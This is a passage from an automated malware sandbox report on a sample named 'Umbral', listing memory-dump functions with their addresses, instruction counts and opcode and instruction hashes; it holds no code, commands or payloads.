                                        • Instruction ID: a11bd982f3389c0daeb99e3acbad53c93ddc7b3f57eaac36a036af56a3a05ff1
                                        • Opcode Fuzzy Hash: 5f7601739208999cc5e749f7239a918d644f9a965bc85192029df75432aeae28
                                        • Instruction Fuzzy Hash: 74C18F21A1DE4B9FE6E9FA5D546063536D1FF69740F4800B9D90EC7187EE68FC058388
                                        Function 00007FF848E8CF00 Relevance: .4, Instructions: 375COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 79cda8257266f53afd3d1d48ed3b11cb7654ba29f9b75e59fc466958397893ce
                                        • Instruction ID: 898fa41e72c58e341136a877af8ab8aae9730647ec11e65e23ef7e67f3b07e79
                                        • Opcode Fuzzy Hash: 79cda8257266f53afd3d1d48ed3b11cb7654ba29f9b75e59fc466958397893ce
                                        • Instruction Fuzzy Hash: FCA11762E0DA9A1FE759B73858151F97BE1FF463A0F4801FBD04CC7193DE29680A8355
                                        Function 00007FF848E92170 Relevance: .4, Instructions: 373COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5e006944cd506a0dd2db180897faa95151202372046a3317a2e236f148278316
                                        • Instruction ID: 42723e1233e77f2a6bb66eeccefaf1c5e2ee477503456aa19d327270c029bb95
                                        • Opcode Fuzzy Hash: 5e006944cd506a0dd2db180897faa95151202372046a3317a2e236f148278316
                                        • Instruction Fuzzy Hash: 48A1453191CB458FE75DEA2898855B177E0FF9A760F1401BED08AC72A3DA35B886C385
                                        Function 00007FF848E73EF9 Relevance: .4, Instructions: 372COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4b3b4e1f962bfe7f6079f82af32c8ee9ed58c823cd96aca9e59a78b4605f0815
                                        • Instruction ID: 41d410755db0188be03d0f9a8064599b95240d8aafd31fd8dcc634ff9eca353f
                                        • Opcode Fuzzy Hash: 4b3b4e1f962bfe7f6079f82af32c8ee9ed58c823cd96aca9e59a78b4605f0815
                                        • Instruction Fuzzy Hash: 3AC10631A0CA8A8FEB94EB2888552F977E1FF9A354F14017AD45DC72D2DF396806CB41
                                        Function 00007FF848EC4550 Relevance: .4, Instructions: 358COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1b154a20a4656f98063518c1b4a3babd23b76a032c4df03c109dc382c1873c0a
                                        • Instruction ID: 513bd9961fc9bd64b54f183cbda71f19d1ddfa5274b45cf8a69070f738b0a585
                                        • Opcode Fuzzy Hash: 1b154a20a4656f98063518c1b4a3babd23b76a032c4df03c109dc382c1873c0a
                                        • Instruction Fuzzy Hash: 50C18F3091CA4A8FEBA8EA18C48477677E1FF94385F6444BDC44D876D6CB39E886C784
                                        Function 00007FF848EBBC90 Relevance: .4, Instructions: 353COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ea73bac95f8cf87f3d886e4c3ede4020866590555605388b2bcda1c1ff2076f8
                                        • Instruction ID: d38a87fd6c0dd02268ed6b63125a77f2f7ecb5be4c7a13bc31bfe6d119cb0e6c
                                        • Opcode Fuzzy Hash: ea73bac95f8cf87f3d886e4c3ede4020866590555605388b2bcda1c1ff2076f8
                                        • Instruction Fuzzy Hash: 84A1D131A0CE498FE798EB2C945567873E1FFA9790F4401B9D44EC72A3DF38A8428748
                                        Function 00007FF848EB4FE0 Relevance: .3, Instructions: 321COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 25f0a388f3a0e9f7e4678a078d527cd9c26d3a849361cb576cace367ce5803a1
                                        • Instruction ID: 4051f438233ba8e477bb9b3095ad3905d3f7d23744c2ca944afb1d57eb693d29
                                        • Opcode Fuzzy Hash: 25f0a388f3a0e9f7e4678a078d527cd9c26d3a849361cb576cace367ce5803a1
                                        • Instruction Fuzzy Hash: E491B331A1CE498FEB95EB689855AB937E1FFA9384F1500B9D40DC72A2CF35AC01C745
                                        Function 00007FF848E8A2D0 Relevance: .3, Instructions: 318COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 387be137ce2a3ec82a73eff91f643c3bc95164db720af59d9e09aaca70b7d502
                                        • Instruction ID: a3954f8fe8979b71dcc8bd73ae9d09757bcdef188e1c65da82da703b8642786e
                                        • Opcode Fuzzy Hash: 387be137ce2a3ec82a73eff91f643c3bc95164db720af59d9e09aaca70b7d502
                                        • Instruction Fuzzy Hash: 8DA10571A18A099FDB95FF6CD898AA977E1FF69740F0500A9E41DD72A5CB34EC41CB00
                                        Function 00007FF848E70E40 Relevance: .3, Instructions: 290COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0f6aac01b724d2a046fb686edc25e3572ef464269eb36069f8fbab90469bc9a2
                                        • Instruction ID: 38838c90cea0f918c2dbaacea1c2dbb06c4df34e0d11aac3f660751c63325300
                                        • Opcode Fuzzy Hash: 0f6aac01b724d2a046fb686edc25e3572ef464269eb36069f8fbab90469bc9a2
                                        • Instruction Fuzzy Hash: 6C81F331E1CE4D4FD798EB2C94456B9B7E1FBA9391F04427AD00ED3296DF34A8428785
                                        Function 00007FF848E8BCE0 Relevance: .3, Instructions: 286COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: febedb2f810f5a9d5fa6248183c6acf498353b030adbb430a9544e2fda90ee33
                                        • Instruction ID: f8b8a7f474dc50731441571c273370bcd7c068992c2b6685427ee5f727476cb9
                                        • Opcode Fuzzy Hash: febedb2f810f5a9d5fa6248183c6acf498353b030adbb430a9544e2fda90ee33
                                        • Instruction Fuzzy Hash: 77816D3190DA8A5FE765BB6898011F97BE0FF423A4F4501BAD48DC7093DB78780A87C5
                                        Function 00007FF848E99240 Relevance: .3, Instructions: 285COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 471c7f76fb6e629a39c4af7647d5915e8245b51cd3326a4e99080cdbc2ab41ae
                                        • Instruction ID: 14855aad2767ae06d1dc46c825075aee4a954677fe9393a117bed9c02cfd1cd0
                                        • Opcode Fuzzy Hash: 471c7f76fb6e629a39c4af7647d5915e8245b51cd3326a4e99080cdbc2ab41ae
                                        • Instruction Fuzzy Hash: D781F030A2CA0A4FD32AFA28D480975B3E1FB99354B1446BDD58EC7297DE74FC428784
                                        Function 00007FF848E7F785 Relevance: .3, Instructions: 283COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f77507d2ff3b7746a2f9129a9accf7631bd901b71d50b14cda3ea2fb36ea0fce
                                        • Instruction ID: ca2741bc4d813a51efb85bd37a248050b8523d2dc5d219330774cb84da345f63
                                        • Opcode Fuzzy Hash: f77507d2ff3b7746a2f9129a9accf7631bd901b71d50b14cda3ea2fb36ea0fce
                                        • Instruction Fuzzy Hash: EC91243190CA8A4FFB94EF2888156F97BE1FF59350F1401BAD859C72D2DB38A906C741
                                        Function 00007FF848E8B6B8 Relevance: .3, Instructions: 276COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1641d861fa9494bdd516072df5ded2eb1a00f734ccbc3a109afb06406aaccee0
                                        • Instruction ID: 590483947c5c07138b0e4fa8398a9ccff6d7860978c887d4117f2d03c569df05
                                        • Opcode Fuzzy Hash: 1641d861fa9494bdd516072df5ded2eb1a00f734ccbc3a109afb06406aaccee0
                                        • Instruction Fuzzy Hash: 54711231A0CA451EE75CBA2CA4426FA73D1FF99360F44517EE08EC3287DF25B8468389
                                        Function 00007FF848E70E48 Relevance: .3, Instructions: 273COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 85a4bec2a14a77ed3dcf664fb48a405dcbeca8f1ce8a98523d0cb32978324bf5
                                        • Instruction ID: 3186f223ea747498bab8f267fb46c8eb12fea246559d4637ce2d600c7241508b
                                        • Opcode Fuzzy Hash: 85a4bec2a14a77ed3dcf664fb48a405dcbeca8f1ce8a98523d0cb32978324bf5
                                        • Instruction Fuzzy Hash: 8A713731B1CB491FE758BA3C981617AB7D1EB9A790F04427EE44EC3297DE34AC024286
                                        Function 00007FF848E809EE Relevance: .3, Instructions: 270COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6fe4bb5c8505fd8a9f5835c754450f110ea8c7ea386575e397c7c4b39e431bc5
                                        • Instruction ID: f3e3e1daf3be95d89ae62a20b6bfda70891ac936fcce2d933fee5e8bfc6f07a4
                                        • Opcode Fuzzy Hash: 6fe4bb5c8505fd8a9f5835c754450f110ea8c7ea386575e397c7c4b39e431bc5
                                        • Instruction Fuzzy Hash: F4913134A1894E8FDB88FF18C494AAA73E2FF68344F5445A8D41DC7296DB35EC46CB50
                                        Function 00007FF848EC4570 Relevance: .3, Instructions: 261COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 02afbf3e25ea2675b49aecb517d2f35a66b5190f7e791e749496ba7303552318
                                        • Instruction ID: 3db4d11ec91e461ea70bcd21897177e24b93b63df18d9146e5b247964f854450
                                        • Opcode Fuzzy Hash: 02afbf3e25ea2675b49aecb517d2f35a66b5190f7e791e749496ba7303552318
                                        • Instruction Fuzzy Hash: B4816E30A1CA0A8FDB58EB1CC884E72B3E1FB99354B644569D04EC7696DB35FC82C784
                                        Function 00007FF848E8A23D Relevance: .3, Instructions: 253COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eb839b44421c3ac1ad4dbfa9fdddfab56449e90a8c5d483997494b1006952abb
                                        • Instruction ID: 4f8499e837566beb25bbfc9ef08ee515ada423ec0292bbc3c4b5ca31a6be5351
                                        • Opcode Fuzzy Hash: eb839b44421c3ac1ad4dbfa9fdddfab56449e90a8c5d483997494b1006952abb
                                        • Instruction Fuzzy Hash: 33717E30E1CA0A8FEB98EA2CD8456B977E1FF99354F10017AD44AC7292DF35F8428785
                                        Function 00007FF848E7BE71 Relevance: .3, Instructions: 253COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a41e0685b96f1ba6686ed6522eff546e4ec5f16eb26de8781c5dfd6d726ce2bb
                                        • Instruction ID: 75dc4825d96cdac86eb04381f1cbb3fdb73ea5b41773bd831328eaba0ad0230d
                                        • Opcode Fuzzy Hash: a41e0685b96f1ba6686ed6522eff546e4ec5f16eb26de8781c5dfd6d726ce2bb
                                        • Instruction Fuzzy Hash: 92916F30918A4E8FDB89EF54C895AEEB3B1FF64340F540579D81AC7296DF39A842CB40
                                        Function 00007FF848E772C0 Relevance: .3, Instructions: 251COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b3b997f88f1b026c30b5520b19af4964e5b5c7e8fd706d380bcf48c64c1b07b6
                                        • Instruction ID: f3fb3b31034190f3604f821fd4bc57a1f8e735bd77df7f2f815c55d91dcbe4dc
                                        • Opcode Fuzzy Hash: b3b997f88f1b026c30b5520b19af4964e5b5c7e8fd706d380bcf48c64c1b07b6
                                        • Instruction Fuzzy Hash: 5C617D73F0DA595FE319B76CBC960F57790FF412A5B0842B7E089C3193EE2958028699
                                        Function 00007FF848E84617 Relevance: .3, Instructions: 251COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ea70178ce692931bb71e28b61b5c4243cab53ad0bf6cf89929197662ce5398de
                                        • Instruction ID: 8a9debadfb49a5d59cff69d3974c91d797ff9c6907b9d0c67ba3c13b576a4141
                                        • Opcode Fuzzy Hash: ea70178ce692931bb71e28b61b5c4243cab53ad0bf6cf89929197662ce5398de
                                        • Instruction Fuzzy Hash: 5A71363180CA9E4FE765EB3898151F97BE0FF46394F4401BAD85DC7182DB39681A8781
                                        Function 00007FF848E8A279 Relevance: .2, Instructions: 250COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a0705f5937b32754a0e044e8fae542b554eb43dce0180b807f4b43ea02770ff0
                                        • Instruction ID: 37332b8c34278564f2b7c372de8cf43acf7c14b2d7fa186ef0512c3a4d8cc9d1
                                        • Opcode Fuzzy Hash: a0705f5937b32754a0e044e8fae542b554eb43dce0180b807f4b43ea02770ff0
                                        • Instruction Fuzzy Hash: 7C619F3060CB098FD798EB1CD449A7573E1FF99750F1401BAE44EC72A6DF25AC828785
                                        Function 00007FF848EC44B0 Relevance: .2, Instructions: 249COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3843a4ab82789e0a1cde6faa43475763f017419ff0a42c4af9131a3dfaad11c4
                                        • Instruction ID: e71ce0524a13d714b524c310f8ec0d354c259f6d8f5b7a0006ca9c9ad93198df
                                        • Opcode Fuzzy Hash: 3843a4ab82789e0a1cde6faa43475763f017419ff0a42c4af9131a3dfaad11c4
                                        • Instruction Fuzzy Hash: F571E071D1CE4A5FE79CEB2890456B277E1FBAA350F0486BEC04EC3296DF35A4068785
                                        Function 00007FF848E8A6C0 Relevance: .2, Instructions: 243COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2a653ca53eaf6e4404cbc24521e7bc9f5a45445311a9e6241489b5f5f44d6a54
                                        • Instruction ID: 0676f4c2b312e1e03a5ce0731a35b7e6c6e1b5e2be0eb2c5670b4243001dcd62
                                        • Opcode Fuzzy Hash: 2a653ca53eaf6e4404cbc24521e7bc9f5a45445311a9e6241489b5f5f44d6a54
                                        • Instruction Fuzzy Hash: 68711430A0CA495FDB49FB2894419B9BBE1FF59350F1401ADE44AC72A3CB79BC82C795
                                        Function 00007FF848E753F2 Relevance: .2, Instructions: 239COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0837d8fc94b655475759ca2b2a21679f2a9850659fff64b6d279e03acbd7f652
                                        • Instruction ID: 81576f23a800f1bf4784b2a3994a703462be65e78013aea27d6768dd2ca13d98
                                        • Opcode Fuzzy Hash: 0837d8fc94b655475759ca2b2a21679f2a9850659fff64b6d279e03acbd7f652
                                        • Instruction Fuzzy Hash: D7610372D0CB5C8FDB58EB5CA8452F8BBE0FF95321F0442BBD04987252DA346845CB92
                                        Function 00007FF848E753A5 Relevance: .2, Instructions: 232COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 34f17df2036b0378be26e9df7bb9611c383177e609b260c9b6fb80eab54a2849
                                        • Instruction ID: cd5211e47277d725adc7300b5ce26c76594e2f2643db1ec671ffa636581573bf
                                        • Opcode Fuzzy Hash: 34f17df2036b0378be26e9df7bb9611c383177e609b260c9b6fb80eab54a2849
                                        • Instruction Fuzzy Hash: DD711E31D0CB898FDB58EB6898452F9BBE1FF95311F0442BBD04D87292DB346845CB82
                                        Function 00007FF848E8B9FA Relevance: .2, Instructions: 231COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6cc617b0c7402147fa15d6de2317841d56ec7a93866c8c0e7554137b805f3d3d
                                        • Instruction ID: 64b2c505c47f069c042d98192f68c2954b8a7e8994f203fc83f79d339637abcc
                                        • Opcode Fuzzy Hash: 6cc617b0c7402147fa15d6de2317841d56ec7a93866c8c0e7554137b805f3d3d
                                        • Instruction Fuzzy Hash: 5E614C3190DA894FE355A73458161FDBBE0FF86390F4801FAD44CC7093DB39691A8786
                                        Function 00007FF848E8A288 Relevance: .2, Instructions: 224COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7610e5d1db304842c4b06ec15119f285e017b936a9f501a0cb6791182b019410
                                        • Instruction ID: 0156d474a40ea46f049e286522ae838d3b02f802b14240f7af97e661a87275e0
                                        • Opcode Fuzzy Hash: 7610e5d1db304842c4b06ec15119f285e017b936a9f501a0cb6791182b019410
                                        • Instruction Fuzzy Hash: 2851CC31E1CD064FE768F61CA44557973D2FBA87A0F14427ED84EC32DADE35AC424689
                                        Function 00007FF848E7054D Relevance: .2, Instructions: 222COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 194f1cfb3e3410ead560d940af83b072bbf26a71bc036438f29b273c656bfa03
                                        • Instruction ID: 5f5e09f32497486b6b8cfeed56bc2505129129cd632a1bc3a5449100f981e747
                                        • Opcode Fuzzy Hash: 194f1cfb3e3410ead560d940af83b072bbf26a71bc036438f29b273c656bfa03
                                        • Instruction Fuzzy Hash: 66510423F0D9965FE719BBBCA8651F9BB90FF913A1F0801B7D148C7183DE2864068799
                                        Function 00007FF848E88AE0 Relevance: .2, Instructions: 219COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: daff55fcf180bdcb7670de82cfae3e3cdf17f52705cc37ab1dff2f0efa0a1a3f
                                        • Instruction ID: 453dbce7d6b896776b2e2b8045db27161a0973431f585eacb4ad5e76cade7786
                                        • Opcode Fuzzy Hash: daff55fcf180bdcb7670de82cfae3e3cdf17f52705cc37ab1dff2f0efa0a1a3f
                                        • Instruction Fuzzy Hash: 8F618C30A1CA498FDB98EB2CC449A7577E1FFA9350F04057EE44AC72A2DF34B8428785
                                        Function 00007FF848E92618 Relevance: .2, Instructions: 219COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d7ce045d1339f805b50c8c4efa48b7a447472db8f6beb33becd3a133b356a3a0
                                        • Instruction ID: 90a21a02990388984470688365adde6baeb555e7ce134d56090737ee80900bb0
                                        • Opcode Fuzzy Hash: d7ce045d1339f805b50c8c4efa48b7a447472db8f6beb33becd3a133b356a3a0
                                        • Instruction Fuzzy Hash: EE51E322E2CD8A1FEB9DB67854591B977D3FF95298B0C81B6C44AC7187EF28A8074300
                                        Function 00007FF848E83C69 Relevance: .2, Instructions: 218COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f882652ca44ee94160d5061ae1028e2ae1e1977440796c14ad9ba6e2184f9d3d
                                        • Instruction ID: 9cf368ef76a1ac99ff782a75a66c5bacb0c76ae400726720f26b9f06b2c362f9
                                        • Opcode Fuzzy Hash: f882652ca44ee94160d5061ae1028e2ae1e1977440796c14ad9ba6e2184f9d3d
                                        • Instruction Fuzzy Hash: 5F512532D0CA8A1FE766B73898151ED7FE0FF46391F4901BBD448C70D3DA28591A8B82
                                        Function 00007FF848E85339 Relevance: .2, Instructions: 215COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 349b18212f318af32c245d67b72ea5edbe5c12e75b9236e9c1bb33806b9c7893
                                        • Instruction ID: 70ea418cf8cf7badbdffce0cfaf8a2487e29b06188fcc664d8aad54d69134803
                                        • Opcode Fuzzy Hash: 349b18212f318af32c245d67b72ea5edbe5c12e75b9236e9c1bb33806b9c7893
                                        • Instruction Fuzzy Hash: 8B51153280DA894FE765A73498151FD7FE0FF463A1F8901BAD44DC70A3DF28291A8796
                                        Function 00007FF848E877B9 Relevance: .2, Instructions: 215COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a4f704d861de3c6586c68b86227d06a168bc36946ca76d8935f6a87b62efcddb
                                        • Instruction ID: b7c3344f95043afd154f558dc5b6690f5f18376a6d5c050c95183886d95a8473
                                        • Opcode Fuzzy Hash: a4f704d861de3c6586c68b86227d06a168bc36946ca76d8935f6a87b62efcddb
